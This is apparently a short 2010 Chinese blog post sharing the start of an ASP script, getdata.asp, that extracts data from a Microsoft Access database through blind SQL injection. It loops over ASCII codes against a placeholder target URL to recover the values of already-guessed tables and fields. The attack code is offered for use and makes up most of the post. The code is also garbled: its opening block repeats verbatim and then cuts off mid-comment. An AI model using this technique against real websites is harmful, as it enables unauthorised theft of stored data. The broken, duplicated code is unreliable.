通用Access字段数据获取模块
2010-07-30 20:05
281 查看
闲来无事,玩了玩Sql Injection,数据表名及字段名猜测就不贴了,贴一下直接获得已知表名字段名的数据的过程!
getdata.asp
<!--#include file="gbutf.asp"-->
<%
Server.ScriptTimeOut = 6000000
function getuid(n,col,getid)
dim rv
rv = "无"
for i = 0 to 200 '取ASCII码范围,负数(汉字)的没做处理;
dim urlpath 'http://www.xxxxxxxxx.com/news.asp?id=1为要注入的目标地址,为您已经猜测到的表名,where id=为该表的字段id,如果没有,可以更改语句如order by ???%20where%20id="&getid&")="&i&""
getdata.asp
<!--#include file="gbutf.asp"-->
<%
Server.ScriptTimeOut = 6000000
function getuid(n,col,getid)
dim rv
rv = "无"
for i = 0 to 200 '取ASCII码范围,负数(汉字)的没做处理;
dim urlpath 'http://www.xxxxxxxxx.com/news.asp?id=1为要注入的目标地址,